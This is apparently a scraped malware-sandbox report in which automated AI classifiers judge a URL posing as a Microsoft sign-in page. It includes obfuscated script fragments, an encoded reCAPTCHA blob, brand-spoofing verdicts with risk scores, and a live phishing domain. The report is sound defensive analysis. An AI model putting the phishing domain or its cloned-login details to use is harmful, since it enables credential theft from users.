tD=y,Vj=A=H[42].bind(null,2),ku=a),4))>>3||(l=r[5](4,F[z[1]](4,O[12](21,8),U),[F[33](2,a)])),N-7)|53)>=N&&(N-2^24)<N&&(U=e[25](49,this),a=F[32](32,this),this[z[0]][U]=!a),l},function(N,a,U,y,A,l,z){return(l=[8,"P","beforeaction"],N-l[0]>>4<2&&N-9>=6&&(CV.call(this,a.vV),this.type=l[2]),(N|l[0])==N)&&(this.B=a,this.K=A,this[l[1]]=U,this.Z=y),z},function(N,a,U,y,A,l){if(!((N^(l=["P",1,72],l[2]))&11))switch(typeof y){case a:H[17](l[1],U,null,y)}return((((((N+4&15)==2&&(this.B=a,this[l[0]]=y,this.v7=
U),N)|6)&26)==2&&(Yu.call(this,a),this.A=!1,this.I=[],this.o=[]),(N^81)&7)||(this.B=this[l[0]]=null),(N>>2&11)==l[1])&&J.call(this,a),A},function(N,a,U,y,A,l,z,u,p,x,S,Z){if(((N|2)&15)==((N&83)==(((((Z=[70,"e",10],N^Z[0])&15||(S=F[42](24,a)>>>0),(N|1)>>4)||(U=[],a.Z.Ge.Zq.X1.forEach(function(W,P){W.selected&&U.push(P)}),S=U),N)-8^Z[2])>=N&&(N+3^16)<N&&(y.qm(),l=y.response,p=F[45](68,y.ZF),A=T[26](85,"b",a,p,"enterDocument"),l[Z[1]]=A,u=y.response,r[20](38,!1,u)?z="":(x=JSON.stringify(u),z=r[36](35,
x,U)),S=z),N)&&(l=["running","opacity","animation-play-state"],A.P(a),O[18](38,A.o,"display",y),O[18](Z[0],A.o,l[2],l[0]),O[18](6,A.o,l[1],U),O[18](54,A.K5,l[2],l[0])),2))if(u=y.get(l),u!=null)S=u;else{for(u=z=0;z<l.length;z++)p=l[z],Y[32](33,a,A,U,p)!=null&&(u!==0&&(A=Y[48](Z[2],U,void 0,u,A)),u=p);S=(y.set(l,u),u)}return S},function(N,a,U,y,A,l,z,u,p,x){if((((((p=[32,4,0],N^75)>>p[1]<2&&((N^5)&5)>=2&&(this.gs=T[40](12,15,"mid",y,U,a)),N+9^p[0])<N&&(N-p[1]^25)>=N&&(u=u===void 0?Ej:u,l=e[49](29,y,
U),z=typeof l,A=l==null?l:z==="bigint"?e[16](18,BigInt.asIntN(a,l)):Y[24](1,l,!0)?z==="string"?O[17](6,a |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: https://www.google.com/recaptcha/api2/anchor?ar=1&... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Google reCAPTCHA initialization script. While it contains encoded/base64 data (+1) and includes external resource loading (+1), it's from a trusted domain (google.com) (-1) and follows expected reCAPTCHA implementation patterns. The encoded data is a standard practice for reCAPTCHA's configuration and background data."
} |
recaptcha.anchor.Main.init("[\x22ainput\x22,[\x22bgdata\x22,\x22Ly93d3cuZ29vZ2xlLmNvbS9qcy9iZy9fZzdGOHpnMkdkTzNwT0hSbUYyVGtMcEdzVndQcXlmNm1mQzVBOFYzWGRVLmpz\x22,\x22\x22,\x22bUl1Z254SW1WY1VNRjhJclo2RWtLRStXeFFScjRKRmhabEdWdGVlcnNZNlNXWDVWa2ZkekFWclFEL3hsZVRVdXFBWmxGcUlLT3FoRnZoRitaOVBObkJPS3lVbkNVZVJnY0l0Q2N1RGtpT0Y5UC9WMUc5a2d6MzFabU5tR0MvUURaYXljVlAxRHNJUG12RG54bkZHU2ZxTkZCMU5zU21vOEJ0Z1VFM09Kck05dW5QU1EycExpQVk0aFM4bHVuc3hmcHFXY0kydHpVbC9DV0tRbDJVY2NoT3JDZFE1NzUvNFFmNDhvaEMvSElmcEhQcVBBa2NIOEpwTjR1c0NxQlVuNWFDaWNZZUxaRVMrcFBPQ2I4NittSGRUZXBsQkF2b0V4bzluV1hxeHdpZE5zbElDSG1oN3V2T0NjVWZ0ZUVNcVlOQ2EvWWlKNi9QQlJrSUNHbW90aUc5TEhyRWsrcURsR0gxSFJiVzdCYWUrVS9hU01LN1lWMTFnb3JsOUpicTBLbHRmS3F6OGRwZFNYK0tTRFJQYlllWnM5cUtwMUhMNVRjcWdiUUN2VDV1a1RDdy9SenErTk1GVWxpVVJSMkl2UklVUldVMjM1UWJsbkxPS2pWcUZYZ1Q2dHdSdzJkZG4wdzhkd0RtYlhiMlJXckF5eDlXaUgvRHBnZnFZZ3RNUk9QdjFGNk9OUjN5MW1pQzZ3UGlCUlhzdllLaGNsWDRuTnh0S2RqUDBFVEdUWC9PNndlNDJicS9kMGF1WkpYVkNYQWg2K1VHRHZWTWNFTmdyMXBPWmRVdzE0bDlzUjJhNW54aFRleXBaeGRZSi9ieDlUSW55WXJBdHdsVThBWFBlUndoMDVHTGgwWnUwNEoxcThubzlMbm91R1BHNmNqcEJFZ09nTHN0eVY5NlB5dVY1WlkyS0xRYXcrVDZ6eWRWOVBqcnhZWGpVamVPN0t1MTFkMnBnSkxoeFpjaTA3STVveEJnbzB3T1M4OWNVL2Z5WFBiS1FZM0Q5NVp4cElkT3FnUUwzVlZJdkVMZmJxRmlJalpxY2lsbEI2dHNGUHM5R250UGxwL1pVK1NkSGYvWHVZeGlJNVJtdWFVN1l5NUdzZFhWK2J6akFNMm00Q0VyTzMwV0Q2MDBnbWlxRGdLSURsbE81aWJTOTlkTGEzNGVVa3R0THQ0am9oVHlVbkdaRlNKblZTRHUxa2szZVMxMEtTVEZ2MllRTGthMlZOOG1hOFd3czhTc0hLRCtOWVhnMS9zaExHZS8yeWxLVnJpMkdWRlg1MmZqOFU5dzM0N1dvbnp4UXdMdTZ0UVBvbjhVcmp0WnQ5ZDRKc216VmR1LzRsQXdVY0J3SkExNXlPOUs2dk53M3lrTTVpbEgycWo1MXRrN3J6Rm5na3JLNnpJeGtSVksxdnU3aG54V0MrNkFJc21zMTBaRHN6aTFRWU9VSHg3eE5PZzF3UXgrQUIzSzN3eUtvMEpLazNGdjd2SjlzNVhZRTg3dkp6T1NZcDJyWDhaQmFOTDBuOSs4UE1xa2tHYXl4eWFmSTc4YkNCQ0hRRVkvc2laM0hjR25RT1RBekdkTGROS1ZETm53eGVybVhCM1FtQUl6N09yejU5MXhKTXVEcWMzWkNzZnViejN5aU5mM0gvMzRnMmY3RDExTElOaSthaUFRQzAweG1iQkpnY3NrVEZjRUVhbXVTdHZQY0hhQVFyd29tMDdEWEw3eVU1MFZheXJFeVE1NWJBeFVvZWVUWlQzS1JtbzgxaXErOTlTMFhXSGpZcE5DNnpSVkpZMEJJVVpWWWJyeUc4ZDFxcVE1Z3BrdDlPM2orcW9CL1cybTlXTm9OcWszM3VES21nOUsrY0wvK2pWYnNDMlBBM3h6elU0NlhocnlFZ3ZkaEpTektxVHVpazlUWC9RM2FvQ2pVUmZSZlY2NTB6VC9pVFdQT2F2N3hZNmVvajgyZzBMWm10ZUFUcTA3a1NDRXprVERxZWtHUFRZb0NKRWZ2NHZMRlMrejVYRjJXN2ZhdFRxdDVyaDNOSnNMK1pseFRTVXhkVVpPMktTN3JYajc3VU9zcGZKMHI2b002T0FTUE1XTkJrcWVoaUJqb3owOW9EMmlqU04yREdqK1JOenE3TzNLV0NFMS91bHhIS3RBV1ZXSUdaN08xaXYzN2QxNlJFSmp4cUNtdlF4emZ5N3RSZ09NcmhMWnMwOGdXTnZkY29YS3A4clJGakZJbDg4Q3dXM3R1YjBOVTZYUkhWNVhWQm9hMmVpNkp2dWNwN1ZPUGRhVXJ0S3RacWwrNERZb2hQbE5ZYys3NTRsdW96VEFSUEczODZqdG9HZEM1STFGdVJrckNXVllYYVZONTR1bTVackNJL01TRkUzK2RYK1BsM2l5c09YSnlzWDNXN0NMVzBNRjJWWFVDNS9kT2xmS0tWdEUyVG95ZWQ1Ri9FV2l1SUJtRDU1eDhnN3dMK3VieEVPQkJDYzVQZmVCbmhMaFMzNXFNOTRGK0JHWXQzcld5OE9lK0dWN2xWM2FEZGJJV0c3Y0wxdkdOZ3RVQ3B0U3FzOW1KUXFIay93UjVZWm1pR0NibzZwNlZ1SU0xVmF1TTl0UGltNEpIaHBpbDZHQkF0UkNsRU5JVTZiVW9jNUVZQU1HOWhHV2o3enV2NkFpL1pRYjJ1anhZVmExMmt0b1pvbHgyYkNoK0Q3RWVZcEpMQVQyRXNVTldFd0pGUW82bUZIblNEZDhwQ3oxWXlkQVhIbjBZRzhRUEZmTHhCNWVaSGpndEgvWEsycDJKcGx3Qk45S2JIYk9XZmMrcm4wS2hFVW5razZvTlRCS0RxRCtvWnQ5cHV6eHV4ZFQxRFJZMjRRek9IeVl1eTV4eUxzbXdNeUt4ZzQ0bGNoaHJWdkFCZUU3VHIrU2tuYmt5NmJSa0VFbnRMV1dGOE5wVm9tWTJoL1lsNG1WaG5WQWsxN3Q2dTJNdFFDMUFEb2dLeE42a0VNL016aWdFQlgybHZXNlFUM3JrUzRVZVBFaUpVRFUwbWZQSHJpNTJLTjF6WEl6ZGtqT0dxT1hXd29BRGd0OXpsdEhieWt6ZGQ4MnZHVStGUUN3Snh1QVJKazhKcjd0N05saENpUHNFY1VjMnBOMmhBcXFtZkluT1hTWXhPMXpDQlQxWml2Qk1hN1BmdUJqcG1zTzM0eXR5RFg1Lys5Q21LWGFlQVdrVmFZMmhoQzR4NVRrdzYrTTdMV0Q3Ky9VbzZyVnNXa3liYzdwQzFCbXdINUtzdDM2aHZ4OXZMZEM2VExyaDhuT0Z6SGtCdXBkVDZteXpSTkNHSVo1T01rYzh6dEZFZWFZVVdKSGNPUVB6cFlpaFdXNXpycmttd0U0Z2pGK1dqdk1INCsvSkY1OEI4V0N2cEoxNjYxTjZFd2p4TE1nanNsWWNpSkpzU2pKVEVWY2FoT2kyUWxuQWRTR2FGc2xmYjl2dFJZcjRlclNta3NBRDJiblBkMGFsOE9Wa21zWEgwSy9tNVdUdUtqUzNmYmwwemV1Ly9YUitWVDRVZDhka0E4YUZtWkRkbFFveGFBckVOK0tYbHAxL0JKRE5zRDBlaW5ONkE4M1l2ekdkMUg2RGVkQW5BbUdxWlFZVmhXdVZtYVJza284azkyb0t4YTQvUmw3SzNKekVPVHA5Nk1LbG5ORzBaQ2NpdG9MVk9lMzFsMEUwaVpKRjNtd0o5cFRVSzl1bVVaNTY3dW9NR0JYdWxvN0U3SGJMSFhNblZZYm5TeVJsWE5RK1FFKzNFZDdaVEVtcDZlQ0Nhb2R4WFJSVzFFNnZHMG53Z3hCQ0VlVUl |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'voicenjsecurenaj.lookingforwardllc.org' does not match the legitimate domain for Microsoft.", "The domain 'lookingforwardllc.org' is not associated with Microsoft and appears to be a third-party domain.", "The subdomain 'voicenjsecurenaj' is unusual and not typically associated with Microsoft services.", "The presence of input fields for 'Email, phone, or Skype' suggests an attempt to collect sensitive information, which is common in phishing sites." ], "riskscore": 9}
Google indexed: False |
URL: voicenjsecurenaj.lookingforwardllc.org
Brands: Microsoft
Input Fields: Email, phone, or Skype |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'voicenjsecurenaj.lookingforwardllc.org' does not match the legitimate domain for Microsoft.", "The domain 'lookingforwardllc.org' does not have any known association with Microsoft.", "The presence of 'voicenjsecurenaj' as a subdomain is suspicious and not related to Microsoft.", "The URL structure suggests a potential phishing attempt due to the unrelated domain and suspicious subdomain." ], "riskscore": 9}
Google indexed: False |
URL: voicenjsecurenaj.lookingforwardllc.org
Brands: Microsoft
Input Fields: Email, phone, or Skype |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Face, fingerprint, PIN or security key",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://lookingforwardllc.org Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://lookingforwardllc.org |
Edit tour
chrome.exe (PID: 6912 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node